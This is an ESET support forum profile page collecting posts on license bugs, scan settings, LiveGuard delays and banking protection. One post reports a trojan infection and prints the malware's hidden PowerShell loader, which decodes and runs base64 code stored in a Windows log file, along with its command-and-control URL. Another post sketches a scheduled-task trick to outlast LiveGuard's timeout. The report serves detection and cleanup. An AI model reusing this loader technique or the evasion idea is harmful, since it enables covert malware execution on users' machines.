Leonardo

Kudos

  1. Upvote
    Leonardo received kudos from Aryeh Goretsky in ESET Pasword Manager - keeps saying license expired even if its not   
    Hello,
    I solved my problem; the trick is I had not created my password account on "myESET".
  2. Upvote
    Leonardo gave kudos to Tetranitrocubane in Extreme CPU usage from ESET   
    For anyone else in the future who might have this issue and comes across this post:
    After doing some poking around myself, I actually got to the bottom of this this morning. This issue was caused by having the "Removable Media Access" option checked under "Scan on" in the "Files system protection" settings.

    After turning this off and rebooting, the system returned to normal operations.
    From what I could gather, having this option selected meant that at boot, the entirety of my external Time Machine drive was being scanned silently. When Time Machine then attempted to launch a backup at the same time, the combination of these simultaneous scans and backups ground the system to a halt. Checking my backup logs, none of my iterative backups had completed since I upgraded to 7.3.3700.0, which is when I selected this option "on", foolishly assuming it'd target USB thumbdrives and the like - That's on me. I ought to have recalled that external USB backup drives count as removable media.
    Since turning this option off, the system is under less strain, scand is not out of control, and my backups are completing. 
  3. Upvote
    Leonardo gave kudos to ciberzombie in ESET Pasword Manager - keeps saying license expired even if its not   
    should i enable diagnostics in password manager on my end to help?
  4. Upvote
    Leonardo gave kudos to ciberzombie in ESET Pasword Manager - keeps saying license expired even if its not   
    license is up on auto extend each month (using smart security premium) but password manager keeps popping up license expired message even if in its own [settings > my account] it shows it only expires in about month or so.
    also password manager icon in browser [firefox 114.0.1 64 bit] keeps flashing with red dot. i have used password manager for more than year, switching thru several eset smart security premium licenses (due to having to change payment method or adjust devices amount on license).
    pc is basically 24/7 only restarting if some update requires restart (or if system crashes, which happened like once or twice this year).
    shutting down this pc very rarely, like maybe once per month or even rarer
    pc runs win 10 pro , i7 10700kf 3,8ghz 8 core cpu, 32 gb ddr4 memory (single channel, single stick).
  5. Upvote
    Leonardo gave kudos to ciberzombie in ESET Pasword Manager - keeps saying license expired even if its not   
    wait, you already looked to it from your end? that's pleasantly unexpected
    huh, i thought i would need to give more info and what account is that, but it seems that eset support is getting info regardless. now that's what i call pro-active support, i wish that other services support would be so active and good as eset is.
    other account is on c*@*.com mail, with same buyer info
  6. Upvote
    Leonardo gave kudos to Marcos in ESET Windows home products version 16.1.14 have been released   
    ESET NOD32 Antivirus, ESET Internet Security and ESET Smart Security Premium version 16.1.14 have been released and are available for download.
    Changelog:
    Version 16.1.14
    NEW: Added Live Tiles on Overview page
    NEW: Added new Light / Dark mode switch to GUI
    IMPROVED: Additional network details displayed under Network adapters in GUI
    FIXED: various fixes and minor improvements
    Known issues:
    N/A
    Upgrade to Latest Version
    Upgrade my ESET Windows home product to the latest version
    If your ESET security product has not updated automatically yet, you can enforce product update by manually checking for update in the Update panel or wait until it updates automatically.
    Support Resources
    ESET provides support in the form of Online Help (user guides), fully localized application and Online Help, online Knowledgebase, and applicable to your region, chat, email or phone support.
    Online Help (user guides)
    Visit www.eset.com/contact to email ESET technical support
  7. Upvote
    Leonardo received kudos from LesRMed in Where is Eset in the AV-TEST test?   
    Hello,
    I'm wondering why those who are not satisfied with ESET or worried about these tests did not simply change their AV ?🙄
  8. Upvote
    Leonardo gave kudos to Marcos in More LiveGuard Concerns   
    Yes, it's safe. In 99,9% of cases you get the same modules both from the regular and pre-release update channel. Even in the enterprise environment we recommend updating from the pre-release update channel on a small subset of computers.
  9. Upvote
    Leonardo gave kudos to shocked in More LiveGuard Concerns   
    i downloaded itman's file from a few posts back and although it's detected as malicious, it's never sent to LG. i even enabled pre-release updates and the program still didn't send it.


  10. Upvote
    Leonardo gave kudos to itman in More LiveGuard Concerns   
    Reviewing my Eset Event log, the answer to why you did not receive a LiveGuard safe verdict is as follows.
    It appears Eset designed LiveGuard processing to run silently in the background. That is when a file is submitted to LiveGuard and the file is not determined to be malicious, you will receive no verdict Event log entry. The only time you will receive a LiveGuard safe verdict Event log entry is when you try to access a currently locked file prior to LiveGuard completing its cloud processing.
  11. Upvote
    Leonardo received kudos from New_Style_xd in More LiveGuard Concerns   
    I had tweaked "30 minutes" for the maximum wait time, it is not possible to choose more time.
    I think it is really dangerous: without any clear notification saying "safe" or "unsafe", the situation remains ambiguous; the most secure for the basic user who is not careful is to block the file till the result of LiveGuard analysis.
  12. Upvote
    Leonardo received kudos from New_Style_xd in More LiveGuard Concerns   
    Hello @Marcos
    I have another problem.
    Yesterday a file was sent to LiveGuard at 23:22:56 and 25 minutes later at 23:47:40 the analysis was not finished, but the file was unblocked. I think that it is very dangerous! And I did not receive any answer later to know if this file is safe or not?!

  13. Upvote
    Leonardo gave kudos to itman in More LiveGuard Concerns   
    I had one that took 35 mins. .................

  14. Upvote
    Leonardo gave kudos to itman in More LiveGuard Concerns   
    Eset will unblock a file after the "Maximum wait time for analysis result expires." The default value is 5 mins.
    As far as if there is a risk associated with this, theoretically the answer is yes. To exploit this however would require an attacker to perform system modifications prior to the executable/script being dropped. One example would be creating a scheduled task to run every 6 mins. or so that in turn, runs the executable/script.
  15. Upvote
    Leonardo gave kudos to Marcos in More LiveGuard Concerns   
    Please check if the issue with the delay in sending files to LiveGuard persists after switching to the pre-release channel in the advanced update setup.
  16. Upvote
    Leonardo received kudos from Tonyset in Banking & Payment Protection   
    Hello @Marcos
    Thanks for your solution👍
    I just uninstalled and reinstalled ESSP and now Banking Protection works fine.
  17. Upvote
    Leonardo gave kudos to Kevin999 in Two strange powershell processes (maybe coinminers?)   
    Yesterday, I found some strange internet traffic when I was using Wireshark. Then I used the EIS "network connection" tool and found it was created by powershell (I didn't run any powershell). This issue reproduced today.
    Conhost.exe and powershell.exe were running in the background, but I didn't run either of them. Powershell connected to [2606:4700:3031::ac43:9c07]:80 (today the same as yesterday); conhost doesn't seem to have had any network activity. I used Wireshark to capture packages, then used the filter ipv6.addr==2606:4700:3031::ac43:9c07 , and found it was using HTTP/1.1 with connect method. Please note the strange strings in X-User-Agent. By the way, TLS (TCP-443) and QUIC (UDP-443) were created when I used Sandboxed Firefox to visit xttps://private-chatting.com/ and xttps://api.private-chatting.com/ (!!! BE CAREFUL to visit them !!!); these websites are using Cloudflare to protect themselves. I used ESET SysInspector to capture a snapshot. I used nslookup to resolve:
    C:\Users\Admin>nslookup 2606:4700:3031::ac43:9c07
    DNS request timed out.
        timeout was 2 seconds.
    服务器:  UnKnown
    Address:  192.168.1.1
    DNS request timed out.
        timeout was 2 seconds.
    *** 请求 UnKnown 超时
    C:\Users\Admin>nslookup api.private-chatting.com
    DNS request timed out.
        timeout was 2 seconds.
    服务器:  UnKnown
    Address:  192.168.1.1
    非权威应答:
    名称:    api.private-chatting.com
    Addresses:  2606:4700:3032::6815:38d6
              2606:4700:3031::ac43:9c07
              104.21.56.214
    __Today__
     I find the command line parameter of one of the powershell.exe by taskmgr (it cost about 10% CPU): "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer  n; $a=Get-Content C:\Windows\logs\system-logs.txt | Select -Index 17033;$script_decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a)); $script_block = [Scriptblock]::Create($script_decoded);Invoke-Command $script_block}
          2. Find C:\Windows\logs\system-logs.txt , find these strings

    Snipped: The code was moved to the attached file to squeeze the post.
     
    Please note $EndPointURL = "hxxp://api.private-chatting.com/connect";
    It's the same as the URL in the pcapng file.



    system-logs.txt Strange traffic_20220424.rar
    system-logs.rar
  18. Upvote
    Leonardo gave kudos to Marcos in Two strange powershell processes (maybe coinminers?)   
    A detection will be added: PowerShell/Agent.GZ trojan
  19. Upvote
    Leonardo gave kudos to ca81 in Two strange powershell processes (maybe coinminers?)   
    hi i have the same process.
    how to remove it.
    i tried to disable powershell etc... but nothing.
    have lock ip in firewall same now new.
    how can i do for remove pls ???
    ty
     
    execute nod32 but found nothing
    2606:4700:3032::6815:38d6:80
     

  20. Upvote
    Leonardo gave kudos to itman in Two strange powershell processes (maybe coinminers?)   
    Notice the remote IPv6 address is the same as previously posted that was detected performing coinmining activity.
    Also, it is not normal Win system behavior to see PowerShell running as a stand-alone task for an extended period of time.
  21. Upvote
    Leonardo gave kudos to itman in Two strange powershell processes (maybe coinminers?)   
    In regard to the prior PowerShell code posted:

    Attacker dropped the coinminer code file previously in highlighted Windows log file directory. Attacker is creating App_V process remotely using Sync-AppPublishingServer.
  22. Upvote
    Leonardo gave kudos to itman in Banking & Payment Protection   
    I am running Win 10 Pro x(64) 21H2 and FireFox 99.0.1 and having no issues with Eset B&PP. I also applied latest Win preview updates yesterday. Also my ESSP ver. is 15.1.12
    This issue might be related to Firefox ESR.
  23. Upvote
    Leonardo gave kudos to Marcos in Banking & Payment Protection   
    Do you have the latest version 15.1.12 installed? If not, try uninstalling the current version, download the installer from www.eset.com and install it. If you have the latest version, try uninstalling and reinstalling it even if you have the latest version and the issue persists after a reboot.
  24. Upvote
    Leonardo gave kudos to itman in More LiveGuard Concerns   
    It is also noteworthy to review how ESSP performed in AVLab's recent Banking and Payment Protection test: https://avlab.pl/en/overview-of-techniques-and-attacks-in-windows-11/ .  Some work needed by Eset in this area.
  25. Upvote
    Leonardo gave kudos to New_Style_xd in More LiveGuard Concerns   
    This is a wonderful result, I'm glad ESET achieved this result.